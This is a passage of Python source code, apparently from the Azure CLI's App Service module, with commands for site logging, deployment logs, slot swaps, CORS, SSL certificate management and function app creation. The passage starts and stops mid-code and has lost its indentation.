if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
